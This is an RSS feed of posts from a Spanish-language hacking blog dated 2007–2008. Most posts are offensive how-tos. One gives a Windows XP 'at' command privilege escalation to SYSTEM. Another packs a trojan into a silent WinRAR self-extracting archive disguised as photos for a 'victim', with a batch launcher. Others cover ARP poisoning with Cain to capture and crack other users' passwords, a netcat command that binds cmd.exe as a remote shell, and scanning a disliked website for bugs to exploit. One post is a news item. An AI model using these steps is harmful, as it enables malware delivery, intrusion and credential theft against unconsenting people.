<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BlogDelHacker &#187; NKRA</title>
	<atom:link href="http://www.blogdelhacker.com/author/nkra/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.blogdelhacker.com</link>
	<description>Blog sobre seguridad, redes, vulnerabilidades, hacking linux y windows...</description>
	<pubDate>Sun, 09 Mar 2008 00:47:38 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Bug en comando AT. Explicación</title>
		<link>http://www.blogdelhacker.com/2007/07/03/bug-en-comando-at-explicacion/</link>
		<comments>http://www.blogdelhacker.com/2007/07/03/bug-en-comando-at-explicacion/#comments</comments>
		<pubDate>Mon, 02 Jul 2007 23:17:50 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/07/03/bug-en-comando-at-explicacion/</guid>
		<description><![CDATA[Bueno este bug es en el SO Windows XP que tiene el comando at de la consola bueno como trabaja este bug, este bug lo que hace es ejecutar un explorer con privilegios de system.
El comando at creeo que solo funciona en usuarios de administrador asi que si eres un invitado rompe la seguridad y [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno este bug es en el SO Windows XP que tiene el comando at de la consola bueno como trabaja este bug, este bug lo que hace es ejecutar un explorer con privilegios de system.<br />
El comando at creeo que solo funciona en usuarios de administrador asi que si eres un invitado rompe la seguridad y creeea una cuenta admin, ahora el usuario system tiene mas privilegios que un admin asi que usen su imaginacion y usenlo como quieran paa fines educativos!<br />
como es este bug?? lo que teien que hacer es lo siguiente deven abrir una shell (inicio &gt; ejecutar &gt; cmd)</p>
<p>ahora deben poner este comando</p>
<p>c:/&gt;at 20:25 /interactive &#8220;cmd.exe&#8221;</p>
<p>con este comando se ejecutara una shell a las 10:25</p>
<p>despues en la siguiente shell que se abra deven escribir esto</p>
<p>c:/&gt;taskkill /F /IM explorer.exe</p>
<p>esto finalizara el explorer y luego ejecutan otro explorer</p>
<p>ponen esto en la shell</p>
<p>c:/&gt;explorer.exe</p>
<p>y con esto pasaran a ser usuarios system<br />
 bonito bug no!!</p>
<p>informacion sacada de forohack.com pero explicada por mi para que lo entiendad ok</p>
<p>salu2<br />
Yue</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/07/03/bug-en-comando-at-explicacion/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Casi todos los PC`s Tienen Vulnerabilidades</title>
		<link>http://www.blogdelhacker.com/2007/05/25/casi-todos-los-pcs-tienen-vulnerabilidades/</link>
		<comments>http://www.blogdelhacker.com/2007/05/25/casi-todos-los-pcs-tienen-vulnerabilidades/#comments</comments>
		<pubDate>Fri, 25 May 2007 17:26:39 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[Noticias]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/05/25/casi-todos-los-pcs-tienen-vulnerabilidades/</guid>
		<description><![CDATA[ Prácticamente todos los computadores que en uno u otro momento hayan estado conectados Internet tienen, en algún lugar de sus discos duros, código oculto que hace posible su intervención por parte de hackers, señala la consultora Aberdeen Group en su último informe.
El informe es el más sombrío en su tipo presentado hasta ahora. Según Aberdeen [...]]]></description>
			<content:encoded><![CDATA[<p><font size="2"> Prácticamente todos los computadores que en uno u otro momento hayan estado conectados Internet tienen, en algún lugar de sus discos duros, código oculto que hace posible su intervención por parte de hackers, señala la consultora Aberdeen Group en su último informe.</font></p>
<p><font size="2">El informe es el más sombrío en su tipo presentado hasta ahora. Según Aberdeen Group, “hay que buscar de manera exhaustiva si se quiere encontrar un PC que no contenga código maligno oculto”. </font></p>
<p><font size="2">“Casi todos los proveedores de conexión a Internet, muchas redes corporativas y la mayoría de los computadores de particulares contienen código activo que puede ser utilizado para espionaje electrónico, spam, robo de datos, criminalidad informática”, escribe Jim Hurley, director de seguridad informática en Aberdeen Group. </font></p>
<p><font size="2">Hurley afirma que los programas ocultos eluden sin dificultar los programas de seguridad como cortafuegos, antivirus, sistemas de análisis de puertos y herramientas de detección de intrusiones. </font></p>
<p><font size="2">El informe ha sido recibido con críticas por diversas compañías dedicadas a la seguridad informática. En un comentario hecho a la publicación Wired, el experto Bob Antia, de la consultora de seguridad Guardent, señala que “un PC hogareño corriente puede contener grandes cantidades de material comprometedor, pero el problema no es tan grave como se indica en el informe de Aberdeen”. </font></p>
<p><font size="2">Sin embargo, el  nuevo consorcio OIS (Organization for Internet Safety), que entre sus afiliados cuenta a Microsoft, Oracle y Network Associates, confirma que la situación ha empeorado debido a que el tiempo que pasa desde la detección de un agujero de seguridad y el surgimiento de un gusano o virus que lo aprovecha, ha disminuido considerablemente. </font></p>
<p><font size="2">OIS aspira a solucionar el problema estableciendo una estrecha red  de cooperación entre los grandes fabricantes de software. De esa forma se espera, entre otras cosas, conseguir que los agujeros de seguridad sean corregidos con mayor celeridad.<br />
</font></p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/05/25/casi-todos-los-pcs-tienen-vulnerabilidades/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Hacer un Joiner con WinRar</title>
		<link>http://www.blogdelhacker.com/2007/04/30/hacer-un-joiner-con-winrar/</link>
		<comments>http://www.blogdelhacker.com/2007/04/30/hacer-un-joiner-con-winrar/#comments</comments>
		<pubDate>Mon, 30 Apr 2007 22:52:19 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/04/30/hacer-un-joiner-con-winrar/</guid>
		<description><![CDATA[
Hacer un Joiner/Splitter/Binder con WinRAR,
Si queremos hacer un joiner y que no lo detecte los antivirus&#8230; no te comas más la cabeza, hay una forma super sencilla, con el compresor WinRAR (descarga de su web oficial), simplemente comprimimos los archivos que queramos mandar a nuestra victima, por ejemplo unas fotillos, a la hora de comprimirlas [...]]]></description>
			<content:encoded><![CDATA[<p align="left"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar01.jpg" title="WRAR!"></a><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar03.jpg" title="WRAR3"></a></font></strong></p>
<p align="left"><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Hacer un Joiner/Splitter/Binder con WinRAR,</font></strong></p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Si queremos hacer un joiner y que no lo detecte los antivirus&#8230; no te comas más la cabeza, hay una forma super sencilla, con el compresor WinRAR (descarga de su <a href="http://www.rarlab.com/"><strong>web oficial</strong></a>), simplemente comprimimos los archivos que queramos mandar a nuestra victima, por ejemplo unas fotillos, a la hora de comprimirlas seleccionamos también el fichero que queremos que se ejecute en segundo plano haciendo todo el mal que queramos (dejar algun puerto abierto, crear usuarios con privilegios de administrador, con comandos que me mande un mail con su IP&#8230;, le paramos el FW&#8230;) lo que sea.</font></p>
<p align="left">&nbsp;</p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar01.jpg" title="WRAR!"><img width="304" src="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar01.miniatura.jpg" alt="WRAR!" height="228" /></a></font></p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Seleccionamos los ficheros que nos interesen, sobre ellos, botón derecho y &#8220;Add to archive&#8230;&#8221;</font></p>
<p align="left"><span id="more-58"></span></p>
<p align="left">&nbsp;</p>
<p align="left"><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar02.jpg" title="WRAR2"><img width="234" src="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar02.miniatura.jpg" alt="WRAR2" height="170" /></a></p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Marcamos el &#8220;Crear archivo SFX&#8221; y pulsamos sobre la pestaña &#8220;Avanzado&#8221;,</font></p>
<p align="left"><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar03.jpg" title="WRAR3"><img width="190" src="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar03.miniatura.jpg" alt="WRAR3" height="143" /></a></p>
<p align="left">&nbsp;</p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">En la pestaña de &#8220;Avanzado&#8221;, hay un boton que es &#8220;Opciones SFX&#8230;&#8221;, pulsamos</font></p>
<p align="left"><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar04.jpg" title="WRAR4"><img src="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar04.miniatura.jpg" alt="WRAR4" /></a></p>
<p align="left">&nbsp;</p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">En ese campo debemos meter el nombre del fichero que queremos que se ejecute en segundo plano al abrir el ejecutable/descomprimir el contenido del paquete, en mi caso un troyano bastante majo, pulsamos sobre la pestaña de &#8220;Modos&#8221;</font></p>
<p align="left"><a href="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar05.jpg" title="WRAR5"><img width="207" src="http://www.blogdelhacker.com/wp-content/uploads/2007/05/joinerwinrar05.miniatura.jpg" alt="WRAR5" height="203" /></a></p>
<p align="left">&nbsp;</p>
<p align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">En la pestaña de &#8220;Modes&#8221;, en &#8220;Modo de silencio&#8221; pulsamos que oculte todo, simplemente es que no se vea el ejecutable, que se ejecute de forma oculta, en silencio, Aceptamos y debería de funcionar perfectamente. Si en vez de un fichero queremos que se ejecuten varios, pues nos creamos un fichero .bat en vez de .exe con este contenido (y lo ponemos como programa que se ejecute primero en el WinRAR:</font></p>
<table border="0" width="20%">
<tr>
<td><font size="2" face="Courier New, Courier, mono">@echo off<br />
start /b programa1.bat<br />
start /b script.vbs<br />
start /b programa2.exe<br />
exit</font></td>
</tr>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/04/30/hacer-un-joiner-con-winrar/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Como Hacer una envenenacion ARP en una Red</title>
		<link>http://www.blogdelhacker.com/2007/04/30/usando-cain/</link>
		<comments>http://www.blogdelhacker.com/2007/04/30/usando-cain/#comments</comments>
		<pubDate>Mon, 30 Apr 2007 22:50:37 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/04/30/usando-cain/</guid>
		<description><![CDATA[Bueno en este paper aprenderemos a sniffar una red con Cain con el fin de obtener contraseñas, pero antes de pasar a la practica veamos un poco de teoria
Normalmente la manera de conectar varios ordenadores en red es mediante Ethernet.
El Protocolo de Ethernet trabaja enviando informacion   a todos los host de la red mediante paquetes.
la [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno en este paper aprenderemos a sniffar una red con Cain con el fin de obtener contraseñas, pero antes de pasar a la practica veamos un poco de teoria</p>
<p>Normalmente la manera de conectar varios ordenadores en red es mediante Ethernet.<br />
El Protocolo de Ethernet trabaja enviando informacion   a todos los host de la red mediante paquetes.<br />
la cabezera de dichos paquetes contienen la direccion de la maquina destino. Solamente la maquina con la direcion que va en   la cabezera se supone que puede aceptar el paquete.</p>
<p>En el caso de   redes compartidoas (HUB’S) , todas las tarjetas de red reciben todos los paquetes y descartan los que no son para ellas, esto quiere decir que los paquetes   se envian por toda la red sin importar si la informacion debe ser entregada a esa maquina o a otra, cuando se recibe la informacion la tarjeta la descarta o no, si va dirigida a ella.<br />
En este tipo de redes solamente   hay que sniffar todos los paquetes que pasen por nuestra tarjeta de red.</p>
<p>En el caso de redes conmutadas (switches) , los datos no viajan por toda la red , el trafico entre el usuario cliente y el servidor solo circulara entre ellos , sin que las demas Tarjetas se enteren.<br />
Osea vendria hacer algo asi</p>
<p>                Resto de la Red (no participa en la comunicacion)</p>
<p>Máquina                        <br />
(Cliente) &#8212;&#8212;&#8211; Router&#8212;&#8212;- Internet&#8212;&#8212;&#8211;Servidor</p>
<p><span id="more-57"></span></p>
<p>Para poder ver el trafico que circula entre ellos debemos posicionarnos como “Hombre en el Medio” de modo que el trafico corra asi</p>
<p>                                                      <br />
Máquina<br />
(Cliente) &#8212;&#8211;Máquina (sniffer) &#8212;- Router &#8212;-Internet&#8212;&#8211;Servidor</p>
<p>Para lograr esto debemos envenenar las tablas arp d la victima   y del router</p>
<p>*En la mayoria del paper se utiliza la palabra sniffer o sniffar para los que no saben un sniffer es un programa que se instala en una red y permite cambiar el estado de la tarjeta de red para que pueda ver todos los paquetes q circulan por la misma.   Entonces llamamos sniffar o sniffing a capturar todos los paquetes que pasen por nuestra red</p>
<p>Ahora si , pasemos a la practica</p>
<p>Escenario:</p>
<p>Tipo d Medio: Conmutado<br />
Atacante: 192.168.1.198<br />
Victima: Todos los usuarios que inicien sesion en algun servicio</p>
<p>Método: Envenenamiento ARP + Sniffing</p>
<p>Herramientas: Cain &amp; Abel<br />
Lo pueden descargar de http://www.oxid.it/cain.html</p>
<p>Lo primero que debemos hacer es descargarnos el Cain   e instalarlo en nuestro equipo (atacante). Finalizada la instalación , nos pedirá que instalemos el Wincap, un driver para la captura de paquetes<br />
Weno ejecutamos el Cain   nos vamos para la pestaña Sniffer y lo activamos haciendo clic en el boton indicado, una vez activado hacemos clic en el signo + , vemos que nos sale una ventana   la cual nos permitira<br />
escánear   todo el Rango de Ips de nuestra red local en busca de los pc conectados.</p>
<p><img border="0" src="http://img258.imageshack.us/img258/7420/cain1ka8.jpg" /></p>
<p>Finalizado el scannig debemos tener Algo Asi</p>
<p><img border="0" src="http://img258.imageshack.us/img258/2242/cain2td0.jpg" /></p>
<p>*Si estuviesemos en un medio compartido,   con activar el sniffer el ataque ya estaia completo,   </p>
<p>Ahora vamos a proceder a realizar el envenenamiento ARP, en la   Pestana Sniffer , en la subpestana APR (abajo) , presionamos el botom   +   y aparecera el siguiente cuadro, donde podremos seleccionar los ordenadores<br />
que queramos envenenar,como nosotros queremos sniffar toda la red, debemos seleccionar la ip del Router ya que contiene todas la demas Ips.</p>
<p><img border="0" src="http://img440.imageshack.us/img440/2461/cain3hy6.jpg" /></p>
<p>Muy bien, solo nos queda activar el envenenamiento ARP , para eso hacemos clic en el icono indicado, y listo tendremos toda la red envenenada de modo que el trafico que pase por nuestra red sera captado   por<br />
nuestra maquina .</p>
<p><img border="0" src="http://img172.imageshack.us/img172/8973/cain4ai5.jpg" /></p>
<p>Listo , solo nos queda esperar a que algun usuario inicie sesion en algun   servidor, cuando esto ocurra el Cain capturara su pass y user , y   generara una especie de log en la subpestaña Password.</p>
<p><img border="0" src="http://img172.imageshack.us/img172/3268/cain5kp5.jpg" /></p>
<p>Y listo solo queda conectarse al servidor FTP con el User y Pass encontrados.</p>
<p>re piola , un usuario de mi red, se conecto a un recurso compartido de mi maquina, y su entrada fue logueada en la subpestaña Password, protocolo SMB:</p>
<p><img border="0" src="http://img172.imageshack.us/img172/5286/cain6ei5.jpg" /></p>
<p>Pero que pasa la celda del Password esta en blanco.</p>
<p>Lo que tenemos que hacer es crackear los hashes que hemos obtenido (LM-Hash / NT-Hash)<br />
Para eso hacemos clic derecho en donde estan los datos y ponemos Send to Cracker, esto lo<br />
Que hace es mandar los hashes al crackeador que viene con el Cain.</p>
<p>Ahora debemos ir a la pestana Cracker, clic derecho sobre los hashes y poner Start Brute Force Atack si queremos realizar un ataque por Fuerza Bruta o Start Dictionary Atack para realizar un Ataque por diccionario.<br />
Ambas opciones pueden ser configuradas previamente pero eso se los dejo a ustedes, ya que no es nada del otro mundo.</p>
<p><img border="0" src="http://img440.imageshack.us/img440/7093/cain7or3.jpg" /></p>
<p>Esto puede tardarse su tiempo pero al final conseguiremos desencriptar los hashes y obtener la contraseña del usuario victima.<br />
Una vez que la conseguimos podemos usar algun programa de control remoto como el   Dameware Mini remote control<br />
Aca hay un manual que hizo Zutra<br />
http://www.foromsn.com/index2.php?Ver=Mensaje&amp;Id=230860</p>
<p>o compartirle el C con el comando Net Use</p>
<p>Bueno eso es Todo.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/04/30/usando-cain/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Principales usos del NetCat</title>
		<link>http://www.blogdelhacker.com/2007/02/22/principales-usos-del-netcat/</link>
		<comments>http://www.blogdelhacker.com/2007/02/22/principales-usos-del-netcat/#comments</comments>
		<pubDate>Thu, 22 Feb 2007 18:16:24 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[Comandos Hacking]]></category>

		<category><![CDATA[Introducción al Hacking]]></category>

		<category><![CDATA[Utilidades Hack]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/02/22/principales-usos-del-netcat/</guid>
		<description><![CDATA[Bueno intentare explicar una de las funciones principales del NC como son un pequeno sniffer, un scann de puertos y una shell remota espero sirva de algo este texto jejeje bueno empezemos..
Para ilustrar mejor como trabajamos con este programa, lo mejor es  que pondre pequeños y practicos ejemplos y analizar su estructura para poder comprender
mejor como [...]]]></description>
			<content:encoded><![CDATA[<p>Bueno intentare explicar una de las funciones principales del NC como son un pequeno sniffer, un scann de puertos y una shell remota espero sirva de algo este texto jejeje bueno empezemos..</p>
<p>Para ilustrar mejor como trabajamos con este programa, lo mejor es  que pondre pequeños y practicos ejemplos y analizar su estructura para poder comprender<br />
mejor como funciona y asi poder crear nuestras propias aplicaciones.</p>
<p> Shell Remota</p>
<p>Obtener un Shell rapidamente en una maquina remota usando la<br />
opcion -l (Listen) conjuntamente con la opcion -e (ejecutar) , cuando el<br />
proggie corre con estas variables y la coneccion es realizada, NetCat<br />
ejecuta el programa elegido y se conecta a stdin y stdout del programa<br />
en la coneccion la red.</p>
<blockquote><p>nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe</p>
</blockquote>
<p>Este comando dejara NetCat escuchando el Puerto 23 (telnet) ,<br />
cuando es conectado a traves del cliente, ejecutaran una Shell (cmd.exe).<br />
la opcion -t le dice a NetCat que maneje cualquier negociacion que el<br />
cliente pueda esperar&#8230;.</p>
<p><span id="more-32"></span>Si esta conexiones realizada desde una maquina NT, el shell<br />
correr los permisos del proceso que han generado a NetCat.</p>
<p>Sniffer:</p>
<p>Otra de las interesante posibilidades de netcat es su capacidad para<br />
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el<br />
trafico del mismo hacia un archivo o hacia pantalla, en este sencillo<br />
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:</p>
<blockquote><p>C:\nc11nt&gt;nc -v -v -L 127.0.0.1 -p 23</p>
</blockquote>
<p>DNS fwd/rev mismatch: localhost != NKRA<br />
listening on [any] 23 &#8230;<br />
DNS fwd/rev mismatch: localhost != NKRA<br />
connect to [127.0.0.1] from localhost [127.0.0.1] 1131<br />
login: sniffado<br />
password: jeje!!</p>
<p>Tambien podemos redireccionar toda la salida a un archivo e<br />
irnos a realizar otras actividades ,ientras netcat hace su trabajo:</p>
<blockquote><p>C:\nc11nt&gt;nc -v -v -L -p 23 127.0.0.1 -t &gt;login.txt<br />
DNS fwd/rev mismatch: localhost != NKRA<br />
listening on [any] 23 &#8230;</p>
</blockquote>
<p>[Aqui viene la connecion.]</p>
<blockquote><p>DNS fwd/rev mismatch: localhost != NKRA<br />
connect to [127.0.0.1] from localhost [127.0.0.1] 1030</p>
</blockquote>
<p>[Todo lo que escriba la conneccion se va al archivo login.txt]<br />
sent 0, rcvd 42</p>
<p>La opcion L permite que netcat escuche nuevamente al terminar la coneccion</p>
<p>Scann de Puertos</p>
<p>Netcat puede ser utilizado como scanner, sus multiples opciones<br />
le permiten realizar un gran numero de combinaciones, pudiendo realizar<br />
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o<br />
descendente, con intervalos de tiempo, utilizando gateways para evitar<br />
mostrar la IP fuente del Scanning, etc.</p>
<blockquote><p>C:\nc11nt&gt;nc -v -v -z 127.0.0.1 53 25 21</p>
</blockquote>
<p>DNS fwd/rev mismatch: localhost != NKRA<br />
localhost [127.0.0.1] 53 (domain): connection refused<br />
localhost [127.0.0.1] 25 (smtp): connection refused<br />
localhost [127.0.0.1] 21 (ftp): connection refused<br />
sent 0, rcvd 0: NOTSOCK</p>
<p>Pues si; aqui tienen un pequeño y primitivo scanner, se le<br />
puede  asignarle un rango de puertos:</p>
<blockquote><p>C:\nc11nt&gt;nc -v -v -z 127.0.0.1 1-53</p>
</blockquote>
<p>DNS fwd/rev mismatch: localhost != darkstar<br />
localhost [127.0.0.1] 53 (domain): connection refused<br />
localhost [127.0.0.1] 52 (?): connection refused<br />
localhost [127.0.0.1] 51 (?): connection refused<br />
localhost [127.0.0.1] 50 (?): connection refused<br />
localhost [127.0.0.1] 49 (?): connection refused<br />
localhost [127.0.0.1] 48 (?): connection refused etc&#8230;</p>
<p>Volvemos con la opcion v (verbose) y la Opcion z (zero i/o)<br />
que es usada para scanning, los puertos se lo especificamos al final del<br />
IP del host, bien sea individuales separados por un espacio; o por un<br />
rango de puertos.</p>
<p>Espero les sirva de algo este pequeño manualillo de algunos comandos del NC</p>
<p>Editado por mi NKRA sal2</p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/02/22/principales-usos-del-netcat/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Buscando Vulnerabilidades con SSS</title>
		<link>http://www.blogdelhacker.com/2007/02/19/buscando-vulnerabilidades-con-sss/</link>
		<comments>http://www.blogdelhacker.com/2007/02/19/buscando-vulnerabilidades-con-sss/#comments</comments>
		<pubDate>Mon, 19 Feb 2007 03:32:49 +0000</pubDate>
		<dc:creator>NKRA</dc:creator>
		
		<category><![CDATA[Utilidades Hack]]></category>

		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://www.blogdelhacker.com/2007/02/19/buscando-vulnerabilidades-con-sss/</guid>
		<description><![CDATA[1. Bájate el SSS (Shadow Security Scanner)
2. Busca una web que no te guste xD
Bueno abrimos el SSS. (Ya bajado e instalado.)
Una vez que ya lo tenemos abierto vamos a proceder a escaner los Bugs 
paso 1.-New Session le damos en Next 
paso 2.- Add Host(agregamos un host a escanear ) Ejemplo www.pagina.com le damos en  Next otravez Next.
Click donde dice página&#8230;. y luego [...]]]></description>
			<content:encoded><![CDATA[<p>1. Bájate el SSS (Shadow Security Scanner)</p>
<p>2. Busca una web que no te guste xD</p>
<p>Bueno abrimos el SSS. (Ya bajado e instalado.)</p>
<p>Una vez que ya lo tenemos abierto vamos a proceder a escaner los Bugs </p>
<p>paso 1.-New Session le damos en Next </p>
<p>paso 2.- Add Host(agregamos un host a escanear ) Ejemplo <a href="http://www.pagina.com/">www.pagina.com</a> le damos en  Next otravez Next.</p>
<p>Click donde dice página&#8230;. y luego a Start Scan.</p>
<p>Esperamos a que se termine el scan </p>
<p>Vemos en la solapa <strong>Vulnerabilitis</strong> y chequeamos el Bug, (Si está en rojo mejor) vamos a <a href="http://www.securityfocus.com/">www.securityfocus.com</a> Y vemos que podemos hacer  Si no entiendes la web, vamos a <a href="http://www.google.com/">Google</a> Y vemos como explotar ese bug. </p>
<p>Es mi primer estancia en este blog no sean exigentes ire mejorando mis mensajes gracias!!!! </p>
<p>Saludos. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.blogdelhacker.com/2007/02/19/buscando-vulnerabilidades-con-sss/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
